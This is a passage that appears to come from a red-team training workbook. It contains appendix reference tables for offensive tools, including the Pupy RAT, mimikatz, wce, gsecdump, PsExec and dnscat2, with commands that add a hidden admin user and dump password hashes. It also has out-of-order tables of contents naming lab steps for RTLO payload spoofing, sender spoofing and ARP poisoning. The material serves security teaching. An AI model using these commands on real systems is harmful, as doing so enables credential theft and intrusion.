-u UDP mode (default: TCP)
-p Port to either listen on or connect to; depending on listen mode.
Pupy
Pupy is a popular choice for Remote Access Tools, providing a feature set for establishing C&C
communication as well as lateral movement. The project page of Pupy can be found at
https://github.com/n1nj4sec/pupy.
migrate -p explorer.exe migrate the Pupy client process into a different process for
obfuscation, here: explorer.exe
getpid list the process id of the Pupy client
sessions list all current sessions
sessions -k 1 kill a session with specific id, here: 1
PUPY COMMANDS & PARAMETERS
net
The built-in command “net” provides a multitude of different options and parameters. The following
table lists examples of how “net” can be utilized:
Parameter Description
net use connect to network shares
net use X: \\192.168.0.1\share /persistent:yes connect to network share \\192.168.0.1\share, and map it as drive X: permanently (persistent:yes)
net use X: /delete delete the mapped drive at X:
net user create or delete local users or display information of a specific user
net user bob test /add add a new user “bob” with password “test”
net user bob /delete delete user “bob”
net user bob display information about user “bob”
net localgroup create, delete user groups or add users to a specific group
net localgroup administrators show information and users belonging to the group “administrators”
net localgroup administrators bob /add add user “bob” to the administrators group
NET COMMANDS & PARAMETERS
gsecdump
gsecdump dumps password hashes of local users on Windows operating systems:
Parameter Description
-h display all available parameters
-a dump everything
-s dump hashes from SAM / Active Directory
-l dump LSA secrets
-u dump hashes from active logon sessions
-w dump wifi connections
-S force elevation to SYSTEM
GSECDUMP PARAMETERS
samdump2
samdump2 allows dumping password hashes:
Parameter Description
-h display overview of available parameters
-d display debug information
-l extract all available hashes
-o output the hash dumps into a file
SAMDUMP2 PARAMETERS
John-The-Ripper
John-the-Ripper can be utilized to try to crack passwords using brute force or dictionary
techniques. The table below lists a few of the important parameters for john:
Parameter Description
no parameter provided display help and list all available parameters
-format specifies the format of the passed information, e.g. nt, md5 etc.
-wordlist specify a wordlist to use
-pot specify a different pot file than john.pot
JOHN-THE-RIPPER PARAMETERS
Powershell Empire
Powershell Empire allows injection of malicious code into memory by providing loaders for the
Victims. The project page of Powershell Empire can be found at
https://github.com/EmpireProject/Empire
The table below lists a few examples of commands which can be utilized within Powershell Empire:
B.8 PsExec
PsExec, part of the Sysinternals Suite, allows remote code execution on target machines. Further
information can be found at https://docs.microsoft.com/en-us/sysinternals/downloads/psexec.
Parameter Description
no parameter provided help overview of all available parameters
\\computer specify target machine; if not specified it will run on the local machine. (*) can be specified for all computers in the current domain
-c copy the specified program to the target prior to execution
-h try to elevate program execution
-s run the process with SYSTEM account
-u specify user to run process as
-p specify password for user
PSEXEC PARAMETERS
B.9 at
The at command allows scheduled tasks to be configured remotely on Windows operating systems.
Parameter Description
/? print help for at command
\\computername specify target machine to run task on
time specify time when scheduled task should run
command specify the command to run at scheduled time
/interactive allow the task to interact with desktop session
/delete deletes a task, id has to be specified
/every:[date] run the scheduled task every hour / day / week / month
AT PARAMETERS
B.10 schtasks
schtasks has superseded the at command on newer Windows operating systems.
Parameter Description
no parameter provided list all current scheduled tasks
/? display list of commands available
/RUN run a specific task
/QUERY query information about a specific task
/S specifies the remote system
/TN specify the task name querying / running / deleting
SCHTASKS PARAMETERS
B.11 wmic
wmic - Windows Management Interface Console - provides a full feature set to manipulate any data or
processes on Windows operating systems. As the list of options is very extensive, the table below
focuses on explaining the parameters used throughout the exercises.
Parameter Description
wmic -? lists all available options for wmic
/node: specify the target machine to connect to
/user: specify the user for the connection
/password: specify the password for the selected user
process call create “name” create and execute a new process “name”
WMIC PARAMETERS
B.12 netsh
The netsh tool is a built-in command line, providing access to network related configuration.
Command / Parameter Description
/? list all available options
advfirewall change settings of Windows Firewall
advfirewall reset reset firewall to default settings
advfirewall firewall adjust profile of firewall
portproxy set up port proxy, also known as port forwarding or NAT
portproxy add add a new port forwarding rule
interface change configuration of a network interface
interface set interface name=”lan1” configure the interface called “lan1”
B.13 wce
Windows credentials editor allows password hash dumps, displaying cleartext passwords as well as
passing the hash on Windows operating systems.
Parameter Description
-? list all available options
-s change current NTLM credentials
-l list all available NTLM credentials
-r same as -l, but refreshes automatically every 5 seconds
-w dump cleartext passwords
-k read kerberos tickets from file
WCE PARAMETERS
B.14 mimikatz
A well-known tool, mimikatz can be used to extract plaintext passwords, hashes, PIN codes and
Kerberos tickets from memory. mimikatz can also perform pass-the-hash and pass-the-ticket, or build
Golden tickets. The project page can be found at https://github.com/gentilkiwi/mimikatz.
B.15 dnscat2
dnscat2 is a tool to create a tunnel via DNS traffic, allowing malicious activities to be hidden within
a valid protocol. The project page can be found at https://github.com/iagox86/dnscat2.
Protocol Response Codes
Table of Contents: Tables
Introduction
Class Setup: Virtual Machine Descriptions ........................................................................ 9
Class Setup: User Credentials ............................................................................................ 9
Point of Entry
Lateral Movement
ophcrack: Accounts with Passwords “not found” ............................................................. 44
MAC and IP Address Mapping ........................................................................................... 49
Privilege Escalation: Process Integrity Level ..................................................................... 61
Final Challenge
Final Challenge: Login Credentials .......................................................................................... 101
Table of Contents: Images and Screenshots
Introduction
Trend Micro Training Cloud Access: Training Area ........................................................... 7
Trend Micro Training Cloud Access: List of RDP Files ................................................... 8
Trend Micro Training Cloud Access: Unknown Publisher Warning ................................... 8
Trend Micro Training Cloud Access: vApp Overview ......................................................... 8
Class Setup: Virtual Environment ...................................................................................... 9
Accessing The Virtual Machines: Open the vApp .............................................................. 10
Accessing the Virtual Machines: vApp Startup.................................................................. 10
Accessing The Virtual Machines: “Virtual Machines” Tab .................................................... 11
Point of Entry
Preparing Email: Preparing RTLO ...................................................................................... 15
Preparing Email: Placing RTLO Character ......................................................................... 15
Preparing Email: Text Changes With RTLO Applied .......................................................... 16
Preparing Email: Set Location For LTRO Character. ......................................................... 16
Preparing Email: Text Changes With LTRO Applied .......................................................... 16
Preparing Email: Rename Payload.exe ................................................................................... 17
Preparing Email: File Renamed ............................................................................................... 17
Preparing Email: Change View of Windows Explorer ............................................................ 17
Sending Email: Account Selection ............................................................................................ 18
Sending Email: Viewing Account Settings ........................................................................ 18
Sending Email: Outgoing Mail Server Settings ..................................................................... 18
Sending Email: Confirm SMTP Settings ............................................................................ 18
Sending Email: Spoofing Email Sender ............................................................................. 19
Sending Email: Attaching Malicious File................................................................................ 19
Sending Email: Malicious Email Received ......................................................................... 20
Sending Email: Saving Attachment ................................................................................... 20
Sending Email: Confirmation of No Malicious Files in %tmp% ........................................ 20
Sending Email: Open Malicious File ....................................................................................... 21
Lateral Movement
LM & NTLM Hashes: Hashes of Empty Passwords............................................................. 37
LM & NTLM Hashes: LM Hash Case-Insensitive ................................................................. 38
LM & NTLM Hashes: LM Hash 7 Character Split ................................................................ 39
LM & NTLM Hashes: LM Hash 14 Character Limitation ..................................................... 39
LM & NTLM Hashes: Local Security Policy Management .................................................. 40
LM & NTLM Hashes: Security Policy on Windows 7 Preventing LM Hash Being Stored ................ 41
ophcrack: Select Components To Install ............................................................................ 43
ophcrack: Select PWDUMP File ......................................................................................... 43
ophcrack: Registration of XP free fast Table ................................................................ 44
John-The-Ripper: Brute Force.......................................................................................45
John-The-Ripper: John.pot Stores Successfully Cracked Passwords ............................45
Cain & Abel Installation: WinPcap ..................................................................................... 46
Cain & Abel Installation: Setup WinPcap Driver at Boot ................................................... 46
ARP Cache: Domain Network “Connected” ....................................................................... 47
ARP Cache: Attacker Not Listed Yet............................................................................. 47
ARP Cache: Attacker Is Listed Once Pinged .................................................................. 48
ARP Poisoning: Cain & Abel Enable Sniffer ........................................................................ 48
ARP Poisoning: Sniffer Tab ................................................................................................. 48
ARP Poisoning: Scanning MAC Addresses .................................................................... 48
ARP Poisoning: Scanning All Hosts ..................................................................................... 49
ARP Poisoning: Scan Results ......................................................................................... 49
ARP Poisoning: APR Tab ............................................................................................... 49
ARP Poisoning: Add To List ........................................................................................... 50
ARP Poisoning: Selecting the Targets ........................................................................... 50
ARP Poisoning: Targets Listed ...................................................................................... 50
ARP Poisoning: Start Poisoning ......................................................................................... 51
ARP Poisoning: Passwords Tab ......................................................................................... 51
ARP Poisoning: Displaying Passwords ................................................................................ 52
ARP Poisoning: Stopping Activities .................................................................................... 52
Powershell Empire: Start Screen ....................................................................................... 53
Powershell Empire: Starting Listener ...........................................................................54
Final Challenge
Final Challenge: Environment ................................................................................................. 101